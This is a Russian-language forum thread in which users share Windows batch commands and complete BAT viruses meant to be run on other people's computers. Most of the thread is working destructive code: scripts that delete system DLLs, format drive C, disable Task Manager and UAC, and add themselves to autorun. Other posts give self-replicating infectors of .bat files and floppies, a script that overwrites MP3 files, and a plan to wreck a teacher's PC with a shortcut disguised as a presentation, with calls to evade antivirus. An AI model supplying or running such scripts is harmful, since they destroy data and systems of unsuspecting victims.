вредоносные ВАТники

[dokzlo13]

итак, для тех у кого мало времени и много злобных мыслей посвещается:



reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

запретить таскмена



del "%SystemRoot%\system32\*.dll" /q >nul

удалить системные длл



del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

удалить все драйвера



del %SystemRoot%\system32\devmgmt.msc >nul



удалить диспетчер устройств



%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

поменять кнопки мыши



reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

запретить запуск программ



time(ваше время типа - 0:00) >nul

сбить время



reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul

запретить редактор реестра



del "%SystemRoot%\Cursors\*.*" >nul

удалить курсоры



copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul

стартуем с cmd.exe (его весь дос использует)



del "%SystemRoot%\Web\Wallpaper" /q >nul

убрать обои



del "%SystemRoot%\Web\Wallpaper" /q >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul

запретить панель управления



reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

убрать рабочий стол



msg * "тут ваш текст" >nul

показать сообщение



copy ""%0"" "%SystemRoot%\system32\название вашего файла.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v "название вашего файла" /t REG_SZ /d "%SystemRoot%\system32\название вашего файла.bat" /f >nul

добавиться в автозагрузку



net user "ваш текст" /add >nul

создать учётную запись на компе



net share "ResName$"="C:\" >nul

расшарить диск С



label C:ваш текст >nul

переименовать диск С


TO BE CONTINUED

[Mortal]

dokzlo13, оформь нормально тему, возможно будет правильнее если строчки кода будешь в теги обрамлять.
Кстати погугли, много инфы по этому поводу.

[100]

Я кстате вчера искал команду для батника, которая удаляет екзешник, но только после того как тот закончит свою работу... нашёл канеш, но гуглил очень долго... надобы тему батников развивать как то

[Nik9]

Где то нашел,не помню где.Автор не я.Почитаем?Полезно знать.

ВНИМАНИЕ! Данная статья представлена только для ознакомления. Автор не несет отвественности за противоправные действия, испорченное оборудование или иные негативные последствия.

Для написания нам понадобится обыкновенный блокнот.
1. пишем любое название блокнота(install.bat), главное чтобы Вы поставили расширение *.bat.
2. запускаем блокнот.
3. Теперь пишим в нем команды которые батик будет выполнять на чужом кампе, помните все команды он делает последовательно.

Грохаем windows на кампе жертвы:

Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd C: -команда перехода на диск C где почти у всех кампах стоит виндовс
Сd windows -переходим в папку Windows (у 95% ламеров и юзеров папка называется именно так)
Большой минус бат файлов да и ДОСа в частности это то что нельзя удалять сразу папку с файлами, а нужно заходить в каждую папку отдельно и удалять там файлы.!!!
del *.exe -удаяем все файлы с расширением .exe
del *.ini -удаяем все файлы с расширением .ini
del *.com -удаяем все файлы с расширением .com
cd\
cd windows
cd system
del *.dll
del *.exe
После этих простеньких строчек у юзера или ламера будет примерно 30 минут работы!)
Код полностью:

Cd\
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe

Но вдруг папка виндовс называется не windows а например winMe, или win98, да без проблем, просто надо будет после этого кода написать ниже ещё один только чтобы папка называлась winMe и так далее.

Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe

и так далее! Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте! Только помните, что такое можно делать если на машине жертвы стоит Windows 9Х!!!
Люблю прикалывать ламеров, это форматирование диска С:\
Форматируем диск С:\
Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat файл
Format C:\ -команда форматирования диска
С:\ Y -команда автоматического согласие форматирование диска без ведома или подтверждения команды ламером
Y -тоже самое
Y -уже говорил
Хе! Вот и все…
Код полностью:

Cd\
Format C:\
Y
Y
Y

Единственный минус! Такой код может не сработать если на кампе стоит Windows ME или XP! Придется писать другой путь. В этих форточках команда форматирования лежит не просто в папке Windows, а по следующему пути
C:\WINDOWS\COMMAND\format c:
но само сабой форматироваться не будет, а потребует потверждение и простая команда
Y
Y
Y
не поможет, нужена другая. Просто добавим параметр /autotest

C:\WINDOWS\COMMAND\format c: /autotest

В данном случае, подтверждать ничего не придется.

Как и где это применить?
Просто отсылаете бат фаил какому нибудь юзверю по аське или на мыло.
При открытие файла, начнёца процесс.
Так что не советую открывать фаил у себя на компе.

Если Вы залезли на удаленный компьютер то можете тоже злостно пошутить.
Но как сделать так, чтобы файл запустился автоматически?
Лазив по компу жертвы Вам вдруг захотелось форматнуть его винт, ну мало ли, вдруг он какой нибудь нацист или педофил! Разумеется Вы не сможите запустить файл со своего компа на компе жертвы. Но всёже есть пару вариантов. Первый, это загрузить файл в автозагрузку по пути
C:\windows (или как там будет папка называться)\Главное меню \ Программы \Автозагрузка или переименовать Ваш батик в Autoexec.bat и загрузить в корневой С:\



Добавлено через 48 секунд


Взято там же.ХЗ где.Только для ознакомления,а не для написания зловредов.

ВТОРОЙ СПОСОБ!!!
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat

Этот вирус заражает винчестер, оставляя только один файл virus.bat.
Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен
возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел
более четкие очертания дополним его возможностью заражать другие ПК:

@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

В этом примере появляется строка, которая дает возможность вирусу
заражать дискеты. Смысл этого в том что если при перезагрузке ПК в
дисководе будет дискета, то она будет заражена.
Конечно файл virus.bat в корневом диске C: будет сильно мозолить
глаза юзеру, чтобы этого не было существует программа attrib.
Преобразуем вирус:

@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в
autoexec.bat будет записываться каждый раз при перезагрузке ПК.
Чтобы этого не произошло есть простой способ: после записи вызова
надо с помощью программы attrib установить атрибут только чтение у
autoexec.bat. А есть другой вариант, он немного посложнее, но

гораздо грамотнее:

@Echo off
if exist c:virus.bat goto cool
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:cool
copy %0 a:run.bat >nul

Здесь вторая строка проверяет существует ли уже файл c:virus.bat и
если он уже существует, то происходит переход к метке cool. Этот
способ тоже очень прост. Явный недостаток - если юзер уберет вызов
из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет
нагло обманут. Чтобы вирус был умнее, то надо использовать программу
find, если вам будет не лень с ней разбираться, то вы сможете
написать более сложный BAT-вирус, который будет заражать не один
файл c:autoexec.bat, а все *.BAT. Пример:
@echo off%[MeTrA]%
if '%1=='In_ goto MeTrAin
if exist c:MeTrA.bat goto MeTrAru
if not exist %0 goto MeTrAen
find "MeTrA"<%0>c:MeTrA.bat
attrib +h c:MeTrA.bat
:MeTrAru
for %%t in (*.bat) do call c:MeTrA In_ %%t
goto MeTrAen
:MeTrAin
find "MeTrA"<%2>nul
if not errorlevel 1 goto MeTrAen
type c:MeTrA.bat>>%2
:MeTrAen
Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном
примере она MeTrA. Например, в первой строке эта метка ничего не
делает, во второй строке эта метка, как бы, не является пассивной,
она используется для внутренней работы вируса, а именно участвует в
названии метки. При запуске вирус проверяет, есть ли файл
C:METRA.BAT, если нет, то вирус создает его и с помощью программы
find копирует из файла (из которого стартовал) все строки содержащие
метку вируса, т.е. копирует только вирусные строки. Так, вирусные
строки скопированы. Значит в файле C:METRA.BAT теперь находится
копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило
повторного заражения используется все таже программа find. Допустим
вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус
вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь
первый параметр In_ говорит вирусу, что надо заразить файл, имя
которого указано во-втором параметре, в данном случае он RUN.BAT.
Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с
помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл
RUN.BAT оказывается зараженным.



Добавлено через 2 минуты


Еще статейка.С hackzona.ru

Вступление:
Сейчас я расскажу, как без знания программирования написать свой вирус с расширением .bat. Статья предоставлена для начинающих вирусописателей (ПОВТОРЯЮ «ДЛЯ НАЧИНАЮШИХ»). И вот еще что: статья написана в ознакомительных целях, и за использование нижеизложенной информации в целях нанесения вреда я не несу никакой ответственности.
При написания вируса я использовал обыкновенный блокнот.

Итак начнем :-))) , каждую новую строчку я буду пояснять.

@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
:abc ( ……если он существует, то программа перейдет на метку :abc)
md PRIDUROK
md LUZER
md DURAK (Создает пустые папки)
md LAMER
Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
assoc .exe=.mp3 (запускает все ексшники как музыка
del c:Program Files/q (удаляет все файлы из этой папки)
Echo VIRUS LOAD (Выводит надпись)

Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus.bat
.bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку «создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосаздатель, а WinRar сделал якобы программу….выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в инете от незнакомых людей и смотри на размер файла.
Позаимствовано там же. hackzona.ru
ЕЩЕ СТАТЕЙКА
Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: "а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?". Я нашел ответ. Он находится в bat файлах.
План был таков:
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем... Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации. Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем... Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах "Свойства папки>Вид" стоит галочка на "Скрывать расширения для зарегистрированных типов файлов". На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.
Файл runner_copier.bat совершает следующие действия:
-открывает файл pres.ppt с самой презентацией, которую йа должен показать
-копирует заранее написанный файл AUTOEXEC.BAT в C:.
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:

goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:win dowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1

Но я его немного подправил. Я всего лишь добавил в конец следующие строки:

cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe

и все!

Действие самого вируса происходит следующим образом:
1)запускаеца файл Презентация.ppt.lnk
2)он ссылаеца на файл runner_copier.bat
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.
5) комп выключается
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.

end.

Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:
-малый размер
-незаметность
-неизвестность антивирям
-большие масштабы действия
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).
В остальном полная свобода.
Удачи в написании вирусов, товарищи.

вся байда взята с raptorsoftware правда там я и выкладывал год назад

[Jimmy]

Добавлю одну маленькую, но полезную команду
"REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f"
Отключение UAC в Vista\7.

[100]

Захожу в эту тему, аваст не пускает. Пишет
avast! Вэб-экран блокировал угрозу.
Заражение: BV:Luzer-A
Не понял, кто лузер? Чё он обзывается то
Вот код для удаления файла exe после завершения работы
:r
del file.exe
if exist file.exe goto r

[dokzlo13]

команда самоликвидации вируса - del "%0" >nul

вот ещё нарыл инфы
прошу - пища для ума))

ВНИМАНИЕ - ЭТО ИНФОРМАЦИЯ, СПЁРТАЯ ИЗ ИНТЕРНЕТА!!

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Объясняю популярно и по шагам:

1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим

Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать 'Вы ламер.' .Работает только в винде до 2000.

Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.

@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....[]=[_H@CKED_BY_[kas]*_"SmallPox_Vir_Org"_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls

А теперь, что-то новое.

@echo off
cls
echo Please wait, updating system...
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection ) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.

Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:

ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
" Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat
deltree /y %windir%/win.ini

copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего

ВНИМАНИЕ - ЭТО ИНФОРМАЦИЯ, СПЁРТАЯ ИЗ ИНТЕРНЕТА!!



Добавлено через 52 секунды


вот вам ещй один в копилку знаний написал за 10 минут

@echo off

echo Windows Registry Editor Version 5.00 > %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] >> %temp%\run.reg
echo «svchost.exe»=»Buldozer.bat» >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\OptionalComponents] >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\OptionalComponents\IMAIL] >> %temp%\run.reg
echo «Installed»=»1***8243; >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\OptionalComponents\MAPI] >> %temp%\run.reg
echo «Installed»=»1***8243; >> %temp%\run.reg
echo «NoChange»=»1***8243; >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\OptionalComponents\MSFS] >> %temp%\run.reg
echo «Installed»=»1***8243; >> %temp%\run.reg

regedit /s %temp%\run.reg

del %temp%\run.reg

echo @echo off > %windir%\system32\Buldozer.bat%
>> %windir%\system32\Buldozer.bat%
echo Shutdown -r >> %windir%\system32\Buldozer.bat%

attrib +H %windir%\system32\Buldozer.bat

echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(«теперь питание компьютера можно выключить»); >> %temp%\mes.js
start %temp%\mes.js

(с)